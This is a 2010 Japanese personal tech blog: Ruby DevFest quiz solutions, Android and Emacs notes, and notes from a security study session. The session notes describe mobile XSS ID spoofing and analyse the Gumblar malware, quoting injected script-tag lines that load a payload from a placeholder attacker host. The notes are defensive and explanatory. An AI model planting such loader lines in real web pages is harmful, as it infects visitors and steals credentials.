Wednesday, December 01, 2010

Redmineに関する雑多メモ

本格的にバグトラックをしたいのだけど,2点懸念事項がある。その懸念に対する解決策が既にあるようなのでメモです。 ありがとうございます。 Q: 何も考えずにSQLite3でDBを運用した場合,パフォーマンスに問題はないの? A: Q: ユーザー管理は面倒だ。Google Appsのアカウントは使えないの? A: Redmineをセットアップしてみた

Monday, August 16, 2010

textsize, sp and dp

androidのdimension type, "sp" (scaled-pixels) や "dp" (density-independent pixel) のことがよくわからなかったので,適当にTextViewを作成してみた。画面サイズは,QVGA,HVGA,WVGA800,WVGA854。画面内のテキストのサイズには最初から10pt,14pt,18pt,10dp,14dp,18dp,10sp,14sp,18spと指定してみた。
QVGA
HVGA




WVGA800
WVGA854

Tuesday, March 02, 2010

自分の無能さを晒す 2 Google Dev Fest 2010 の Quiz パッチワーク版

まずは,6時間かかったバージョン。

#!/opt/local/bin/ruby

# read file and create array.
$basearea = []
$hascheckedarea = []
$max_x_size = 0
$max_y_size = 0

open(ARGV[0]) do |file|
  while l = file.gets
    $max_y_size += 1
    l.chomp!
    add_array = []
    add_check_array = []
    for i in 0 .. l.size - 1
      add_array += [l[i].chr]
      add_check_array += [false]
    end
    $basearea << add_array
    if ($max_x_size < add_array.size) 
      $max_x_size = add_array.size
    end
    $hascheckedarea << add_check_array
  end
end


# main routine

def clear_has_checked_array
  for x in 0 .. ($hascheckedarea.size - 1)
    for y in 0 .. $hascheckedarea[x].size - 1
      $hascheckedarea[x][y] = false
    end
  end
end

def is_equal_char_forpoint(compare_char, point_x, point_y)
  # debug_str = "checking (x, y) = (" + point_x.to_s + ", " + point_y.to_s + ")"
  if point_x < 0 || point_y < 0 || point_x >= $max_x_size || point_y >= $max_y_size
    return false
  end
  # p debug_str
  retvalue = false 
  if $basearea[point_x][point_y]
    if $hascheckedarea[point_x][point_y] == true
      # debug_str += (" has been checked ") 
    else
      $hascheckedarea[point_x][point_y] = true
      # debug_str += (" is " + $basearea[point_x][point_y])
      if compare_char == $basearea[point_x][point_y]
        retvalue = true
      else
        retvalue = false
      end
      # debug_str += (retvalue == true) ? "result is true" : "result is false"
    end
  end
  # debug_str += " for ( " + point_x.to_s + ", " +  point_y.to_s + ")"
  # p debug_str
  retvalue
end

def measure_continuous_area(base_char, start_point_x, start_point_y)
  # debug_str = "searching (" + (start_point_x).to_s + ", " + (start_point_y).to_s + ")"
  # p debug_str
  retvalue = 1
  $hascheckedarea[start_point_x][start_point_y] = true
  if is_equal_char_forpoint(base_char, start_point_x - 1, start_point_y)
    retvalue += measure_continuous_area(base_char, 
                                        start_point_x - 1, start_point_y)
  end
  if is_equal_char_forpoint(base_char, start_point_x, start_point_y - 1)
    retvalue += measure_continuous_area(base_char,
                                        start_point_x, start_point_y -1)
  end

  if is_equal_char_forpoint(base_char, start_point_x + 1, start_point_y)
    retvalue += measure_continuous_area(base_char,
                                        start_point_x + 1, start_point_y)
  end

  if is_equal_char_forpoint(base_char, start_point_x, start_point_y + 1)
    retvalue += measure_continuous_area(base_char,
                                        start_point_x, start_point_y + 1)
  end
  retvalue
end

x_axis = 0
y_axis = 0
conarea_size =[]
for x_axis in 0 .. $basearea.size - 1
  line_size = []
  for y_axis in 0 .. $basearea[x_axis].size - 1
    #p $basearea[x_axis][y_axis]
    clear_has_checked_array()
    line_size += [measure_continuous_area($basearea[x_axis][y_axis], x_axis, y_axis)]
  end
  conarea_size << line_size;
end

$basearea.each do |array|
  p array
end

#conarea_size.each do |array|
#  p array
#end

max_area_size = 0

conarea_size.each do |x_array|
  p x_array
  x_array.each do |value|
    if max_area_size < value
      max_area_size = value
    end
  end
end

#debug_str = "max area size " + max_area_size.to_s
#p debug_str

conarea_size.each do |x_array|
  count = 0
  x_array.each do |value|
    if max_area_size == value
      count += 1
    end
  end
  p count
end

何がまずいか。

  • 各点ごとに最大連結エリアサイズを求めようとしている。
  • エリアサイズを求める際に,境界を記録しておく配列 $hascheckedarea (サイズ 600×600)を用意していたが,各点のエリア計算時にクリアしている。
各点ごとに計算しているので,例えば
AAB
BAA
BBA
を例にしたとき,A全ての点でおいて最大連結エリアサイズを求めている。この場合,点(0,0)のAの最大連結エリアサイズが判れば,他の点で計算する必要はない。しかも,$hascheckedarea を各点の計算毎にクリアしているので,とんでもない無駄な計算をしてしまった。

回答終了後,DevFest Quizパッチワーク問題の回答 CommonJS編 (電脳戦士ハラキリ -SE道とは死ぬ事と見つけたり)を見て,最大連結エリアを構成する部分集合のうちの1点だけを記録して,最後に答となる点から連結するエリアを塗りつぶせばいいということと(リンク先の配列 maxScoreCells[]と関数 fill()に注目),チェックした領域を1点ごとにクリアしてはいけない ($hascheckedareaを利用しない。そのかわり,$scoreMapで記録する。このscoreMapは全ての点において正しい最大連結エリアの値を保存しているとは限らない) ということを理解して,改訂しました。

#!/opt/local/bin/ruby

# read file and create array.
$basearea = []
$scoreMap = []

$max_x_size = 0
$max_y_size = 0

# 問題ファイルを読みこみ,元となる配列 $basearea を作成
open(ARGV[0]) do |file|
  while l = file.gets
    $max_y_size += 1
    l.chomp!
    add_array = []
    add_check_array = []
    for i in 0 .. l.size - 1
      add_array += [l[i].chr]
      add_check_array += [-1]
    end
    $basearea << add_array
    if ($max_x_size < add_array.size) 
      $max_x_size = add_array.size
    end
    $scoreMap << add_check_array
  end
end


def is_equal_char_forpoint(compare_char, point_x, point_y)
  # debug_str = "checking (x, y) = (" + point_x.to_s + ", " + point_y.to_s + ")"
  if point_x < 0 || point_y < 0 || point_x >= $max_x_size || point_y >= $max_y_size
    return false
  end

  if $scoreMap[point_x][point_y] != -1
    return false # this point has been already checked
  end
  # p debug_str
  retvalue = false
  if $basearea[point_x][point_y]
    if compare_char == $basearea[point_x][point_y]
      retvalue = true
    else
      retvalue = false
    end
  end
  # debug_str += " for ( " + point_x.to_s + ", " +  point_y.to_s + ")"
  # p debug_str
  retvalue
end

def measure_continuous_area(base_char, start_point_x, start_point_y)
  # debug_str = "searching (" + (start_point_x).to_s + ", " + (start_point_y).to_s + ")"
  # p debug_str
  if $scoreMap[start_point_x][start_point_y] != -1
    retvalue = 0 # チェック済みなので計算させない
  end

  $scoreMap[start_point_x][start_point_y] = 0 # この作業で点 (start_point_x, start_point_y) はチェック済みであることを表す。

  if (base_char == $basearea[start_point_x][start_point_y])
    retvalue = 1
  end

  if is_equal_char_forpoint(base_char, start_point_x - 1, start_point_y)
    retvalue += measure_continuous_area(base_char, 
                                        start_point_x - 1, start_point_y)
  end
  if is_equal_char_forpoint(base_char, start_point_x, start_point_y - 1)
    retvalue += measure_continuous_area(base_char,
                                        start_point_x, start_point_y -1)
  end

  if is_equal_char_forpoint(base_char, start_point_x + 1, start_point_y)
    retvalue += measure_continuous_area(base_char,
                                        start_point_x + 1, start_point_y)
  end

  if is_equal_char_forpoint(base_char, start_point_x, start_point_y + 1)
    retvalue += measure_continuous_area(base_char,
                                        start_point_x, start_point_y + 1)
  end
  retvalue
end

x_axis = 0
y_axis = 0
maxScore = 0
maxScorePoint = []

for x in 0 .. $basearea.size - 1
  for y in 0 .. $basearea[x_axis].size - 1
    #p $basearea[x_axis][y_axis]
    # clear_has_checked_array()
    score = measure_continuous_area($basearea[x][y], x, y)
    if (maxScore < score)  
      maxScore = score
      maxScorePoint = [[x, y]]
    elsif (maxScore == score)
        maxScorePoint += [[x, y]]
    end
  end
end

$basearea.each do |array|
  p array
end

def fill(x, y, chr)
  if ($basearea[x][y] != chr)
    return
  end

  $basearea[x][y] = '_'
  fill(x+1, y, chr)
  fill(x, y+1, chr)
  fill(x-1, y, chr)
  fill(x, y-1, chr)

end

maxScorePoint.each do |point|
  x = point[0]
  y = point[1]
  fill(x, y, $basearea[x][y])
end

$basearea.each do |array|
  p array
end

$basearea.each do |array|
  cnt = 0
  array.each do |chr|
    if chr == '_'
      cnt += 1
    end
  end
  p cnt
end
結果,10秒程度で実行完了。自分の無能さを実感した日でした。

自分の無能さを晒す 1 Google Dev Fest 2010 の Quiz 漢字変換サーバ版

あー,自分でWebサーバ持っていないし,GAEにアプリ登録したこともないから,この問題にはチャレンジできないなと思っていましたが,回答締切6時間前に,別に自分で簡易ウェブサーバ立ちあげればいいんじゃないと思い,急遽やってみました。
幸いなことに,EmacsをChrome上で利用するためにWEBrickを利用したHTTPサーバのスクリプトを読んだこと(ChromeとEmacsを愛するもの達へ 【編集あり】)を思いだしたのが幸いでした。

方針は,

  • 特殊ケース 0 の場合は 零(H) を返す
  • 兆の位の4桁,億の位の4桁,万の位の4桁,一の位?の4桁を抽出して,漢数字に変換する。0や1千の扱い時に注意する。
です。
def trans_4digit_kansuzi(num)
  digit_1st_array = ['', 'G', 'B', 'S', 'A', 'Q', 'Z', 'P', 'C', 'Y'] # 零 一 二 三 四 五 六 七 八 九
  digit_other_array = ['', '', 'B', 'S', 'A', 'Q', 'Z', 'P', 'C', 'Y'] # 零 一 二 三 四 五 六 七 八 九
  unit_array = ['N', 'M', 'J', ''] # 千 百 十 零

  is_top_digit_zero = true
  ret_str = ""
  for i in 0 .. unit_array.size - 1
    tmp_num = (num % (10 ** (unit_array.size - i))) / (10 ** (unit_array.size - 1 -i))
    if tmp_num > 0 || is_top_digit_zero == false
      is_top_digit_zero = false
      if tmp_num != 0
        if i == (unit_array.size - 1)
          ret_str += (digit_1st_array[tmp_num] + unit_array[i])
        else
          ret_str += (digit_other_array[tmp_num] + unit_array[i])
        end
      end
    end
  end

  return ret_str
end

def trans_kansuzi(num)
  if num == 0
    return 'H' # 零
  end

  unit_array = ['T', 'D', 'K', ''] # 兆 億 万 零 

  ret_str = ""
  is_top_digit_zero = true
  for i in 0 .. unit_array.size - 1
    tmp_num = (num % (10000 ** (unit_array.size - i))) / (10000 ** (unit_array.size - 1 - i))
    debug_str = i.to_s + " " + tmp_num.to_s
    p debug_str
    if tmp_num > 0 || is_top_digit_zero == false
      is_top_digit_zero = false
      if tmp_num != 0
        ret_str += (trans_4digit_kansuzi(tmp_num) + unit_array[i])
      end
    end
  end
  return ret_str
end

p trans_kansuzi(ARGV[0].to_i)
本当は
tmp_num = (num % (10000 ** (unit_array.size - i))) / (10000 ** (unit_array.size - 1 - i))
のように上位桁から検証してしまったが,
tmp_num = num % 10000 # 下4桁の値を得る
# tmp_num 文字列生成処理
num = num / (10000 ** i) # 右4桁移動する。
のように,下位桁から検証した方が綺麗。(テストはしていない)

Google Dev Fest 2010 Japan の Quiz 暗号通信版

パッチワークの問題の解き方があまりにも恥しかったので,自分への懲戒のため自分の回答を晒します。(Google Dev Fest 2010 の Quiz) まずは,暗号通信から。 楽に,手を抜くために慣れたRubyで実装しました。

シーザー暗号なんだなと思ったけど,tr コマンドの使い方を理解していなかったことが発覚。なので,地味に書きました。手を抜くために,gemのJSONライブラリ,JSON implementation for Rubyを利用しました。

#!/opt/local/bin/ruby

require "json"
require "net/http"

target_host = "devquiz.appspot.com"
target_file = "/personalpost"
key = "(snip)"

plain_text="my email address"
pass_text=""

for i in 0 .. plain_text.size - 1
  ch = plain_text[i]
  if (ch >= 'a'[0] && ch <= 'z'[0] )    # 小文字の変換
    tmp = (ch - 'a'[0] + 4) % 26
    pass_text += ('a'[0] + tmp).chr
  elsif (ch >= 'A'[0] && ch <= 'Z'[0] ) # 大文字の変換
    tmp = (ch - 'A'[0] + 4) % 26
    pass_text += ('A'[0] + tmp).chr
  else                                  # その他の文字はそのまま通過 
    pass_text += plain_text[i].chr
  end
end

json = {"key" => key, "pass" => pass_text}.to_json
#p json

Net::HTTP.start(target_host, 80 )  do |http|
  # response = http.get('/')
  response = http.post( target_file, json )
  p response
end

tr を用いた別解
DevFestクイズ答案: 暗号通信

Sunday, February 21, 2010

第3回東北情報セキュリティ勉強会に行ってきました。

2010年2月20日に開催された,第3回東北情報セキュリティ勉強会に行ってきました。主催なさった方,講師の方々,会場を手配くださった岩手県立大学の高田先生,ならびに学生様ありがとうございました。
参加したのはセキュリティトラック系。noteから更に抜粋に加え,自分のと思ったこと書きなぐってみます。

「近年のモバイル端末に関するセキュリティ」

  • 日本の携帯は初めっから安全に振られている。しかし,新しい機能を入れたら,それは大丈夫だろうか。
  • 携帯のブラウザにはCookieの概念がない。個体識別番号 (携帯 UID) + src IP アドレスfilterでセキュリティを確保。更にUAを加えて,携帯電話とPCとの判別をしている。 (自分 個体識別番号が盗まれたとき,engress filterをかましていないISPからUAを偽造してアクセスされたらどうなるのだろうか。まだengress filterをかましていないISPはあるだろう?)
  • (自分 高木浩光@自宅の日記 - 日本のインターネットが終了する日をもう一回理解する必要がある)
  • USER_AGENT変更ツール FireMobileSimulator (Firefox add-on)
  • 携帯JavaScriptとXSSの組み合わせによる「かんたんログイン」なりすましの可能性
    XSSの脆弱性を利用して,攻撃用JavaScriptを読みこませる。XMLHttpRequest.setRequestHeader を用いて他人のUIM,iモードIDを産めこむ。 対策 docomo の proxy server 側 で setRequestHeader を無効にした。
  • 新しい機能を実行したら,パソコン関係ではスルーしてしまう問題は,日本の携帯キャリア・ベンダーは対応が早い。
  • iモード専用サイトのhtmlソースの閲覧方法 DNS rebindingを用い,JavaScriptのクロスドメイン制限を回避。(自分 というか,webサイトでソース見られたらまずい実装するのはどうなのか?。DNSの運用の問題?DNSSECは?)
  • Exploiting Smartphone系,iPhone (携帯電話と違い,比較的自由な開発環境)。開発も環境もオープンなため,様々なリサーチが行われている。
  • ARMのexploit codeのdemo (Thumb命令とARM命令を両立させて 0x00を消去する)。OSでも対策はある。W^X 。書き込み(W)と実行(X)を天分にする仕様
    • 書き込みできるメモリ空間は実行できず,実行できるメモリ空間は書き込みできない
    • OpenBSDが採用,mprotect で切り替え可
  • Application側でport listenして,そのlistenしている applicationにvulnerability があれば,攻撃の対象になる。
  • JailBreak,マジコン,PSPのCF。ハードウェアをハックされてしまうとどうしようもない。ハックされないようなハードウェアの設計?OSの設計?
まとめ。
  • 携帯電話はWeb系のセキュリティが主流
    • 携帯ブラウザのAjax, JavaScript関連
  • martphoneは比較的OSやハードウェアに近い部分のセキュリティがメイン
    • iPhoneのjailbreakなど
jailbreakとかroot奪取とかされないような,ソフトウェア,ハード設計をするのはとても大変。ここが企業の持つノウハウになるのか?体力のある企業にしかできない
SmartphoneにターゲットしたJavaScriptコードはどうなるのか?現状,webkitを使用しているので,様問題があるのならば,pcアプリにも同様の問題があるということ。なので対応は早いのではないのか?

Gumblar.x を除いてみた。 メモのみ

  Googleで検索する。
    対策はひっかかるが。
   - Web誘導感染型 (1段階置いて, phising?Web誘導)
   - FTPアカウントの搾取
   - Webサイトの改竄 ? (盗んだFTPパスワードを取得して,改竄する)
   - SQL injection で改竄されても Gumblar?
   - Phishing なのに Gumblar?

  Gumblarを分類する
   - Gumblar.x
   - *.ru:8080 (GNU GPL)

  Gumblar.x
    GENOウィルス = Gumblar     2009年春ごろ
    Gumblar 亜種 (Gumblar.x)   2009年10月中旬ごろ-

    GENOウィルスの絵 (sourceが難読化されている)
    -> document.write("<script src=attacker's siteURL></script>");
    Gumblar.X
    </head>
      <script src="http://***.php">></script>    (飛び先も正規サイト)
    <body>

    見に行っただけで感染

  Pegel.*
   *.ru:8080 - 2009年12月頃
    難読化されたコード

  Gumblar-x Pegel との比較
  利用される脆弱性  Adobe Reader,Flash MSOfficeWeb, IE  Gumblar-x
                  Adobe Reader, MDAC, SnapShotViewer, JRE Pegel
                  QuickTimer を使うのもある

  感染後の動作  FTPアカウントの摂取,rootkit
              自分自身のupdate Gumblar-x
              Downloader(他のマルウェアを落とす), 偽アンチウィルス,SpamBot Pegel
  国内感染情報  3000以上 (Gumblar-x) 350以上 (Pegel)  (クローラーで見ているので,数値にはあまり意味がないのかもしれない。)
      Pegelは12月終わりごろから出現

  今日の話は Gumblar-x の話

  Attack Flow
     Redirect   <script src="*php"%gt; %gt;- これが正規のホストであるので,この段階での検出はNGの可能性が高い。
     Browser Check (UAを確認,未対応は404を返す初めのころはOpera,Firefox等ははじいていた)
                    wgetやweb emulatrion
    難読化されたJavaScriptをdownload
    アクセスしてきたPCの環境をチェックして,該当するexploitをdownloadする。(Active-Xなど)
       downloaderが落としてきたペイロードを脆弱性があるapplicationが実行して,
       更に次の攻撃先にアクセスする。
    最後に,exeが落ちてきて,実行する。

    PDFのフライトレコード (PDFの暗号化,zlibで暗号化)
    CWS Exploit (FWSをzlibで暗号化したやつ)
      いずれにせよ,コアな部分は http://attackerhost.com/gumblar.php? <- このURLにアクセスさせる。

    EXE <- Kates (Danol) と呼ばれている
      -> DLL を作成
      -> Processにインジェクション
      -> 再起動後,真っ暗な画面になる。

  DEMO 

  レジストリの隠蔽
  感染ファイルの保護
  ツールの妨害
  - regmon.exe
  - filemon.exe
  - gmer.exe (rootkit killer)
  - avz.exe  (rootkit killer)

  Hidden Packet
    C&C との通信
     Xost: www.google.co.jp (グーグル searchを実行した時に大量に振ってくるパケットに偽造して IPSにひっかからないようにしている)
    UPDATE
      (自己消滅するものも?)
    FTP情報の窃盗 (Header S0:S1 に FTPのaccountをのせている)
    Anti Anti-Virus for 
     IET / HTTP/1.1 ? なんで IET (オンラインスキャンも,trial version もdownloadできなくする)
     
  CLEANING DEMO  
    Gumblar対策
  感染予防
   OS/Software Update
   Anti Virus softわれの導入
   ScriptやActive XのOff
    - Adobe製品,Webブラウザ 
   パスワードの管理を徹底する?
    - 保存しない
    - 平文で送らない
    - 定期的に更新する
   仮想化を使う
    - VMware
    - サンドボックス
   あとは運を天に任せる

  感染してしまったら
  - 感染PCの処理
    + ウィルスの駆除
    + OSのリカバリ
  - Webページの修正
  - パスワードの変更
  - Backdoorの削除
  - 謝罪文ページの作成
自分のnote
難読化されたJavaScript (そもそも何でそんなことが置きているのか)
unescape, escape コードを動的に生成する。
自分はunix系サーバーなので,Gumblarなんて関係ないよと思ってはいけない。
侵入されたら,<script src="*php"> >-ー これが正規のホスト が埋めこまれるので,感染の土台となる。 passwordの管理。application作者は,生でpasswordを保存してはいけない。セキュアなpasswordの扱い方を。(core-dumpされても大丈夫なように)。IPAのセキュア・プログラミング講座の附則の事態対策など読んでおくべき。

大変だ…。

Friday, February 12, 2010

ChromeとEmacsを愛するもの達へ 【編集あり】

Chromeもいいけど,TextareaはEmacsで編集したいのでFirefox + Dafizilla ViewSourceWith から抜けだせないあなたへ。

より,Edit with Emacs (Google chrome extensions)をどうぞ。

自分はやっぱりemacsclientを使いたいのと,Ruby on Railsの環境を構築済みなので,monoさんのWEBrickを用いたWebサーバー版のを使わせていただきました。
しかし,

temp << req.body
ではutf-8を上手くあつかえていないので( << が駄目だと思う ),自分のところでは,
temp.puts req.body.toutf8
に手直しして使っています。

自分のところのruby-server.rbはこんな感じです。どうもありがとうございました。

#!/usr/bin/ruby -Ku
require 'webrick'
require 'tempfile'
require 'kconv'

$EDITOR = '/Applications/Emacs.app/Contents/MacOS/bin/emacsclient'
$PORT = 9292

server = WEBrick::HTTPServer.new(:Port => $PORT)

trap('INT') { server.shutdown }

server.mount_proc('/status') do |req, res|
  res.status = 200
end

server.mount_proc('/edit') do |req, res|
  temp = Tempfile.new('editwith_')
  if req.body
    temp.puts req.body.toutf8
  end
  temp.close false
  system $EDITOR, temp.path
  temp.open
  res.body = temp.read.toutf8
  temp.close
  res.status = 200
  res['Content-Type'] = 'text/plain'
  res['Content-Length'] = res.body.size
end

server.start

追記 req.body の nil チェック忘れてました。

  if req.body
    temp.puts req.body.toutf8
  end

Sunday, January 24, 2010

Dashboard用のWidget開発してみました

前回のPAkita.mの終わりごろに,何かWidgetを作成してみると宣言したので,試しにDashboard用のWidget,アナログ時計を作成してみました。

開発中の画面はこんな感じです。
img20100124_00
公開は,背景画の使用許可を(書面で!)得なければならないので後ほど。

基本となるHTMLやJavaScriptの動作確認はChronium上で,Dashboard用Widgetを作成する際のデザインや約束事はDashcodeで作成いたしました。この内容を適当に数枚(3,4枚?)ぐらいのスライドにまとめて,紹介できればいいかなと考えています。

次回のAkita.mの出席できるかどうか未定ですが…(すいません。いつも。)

There was an error in this gadget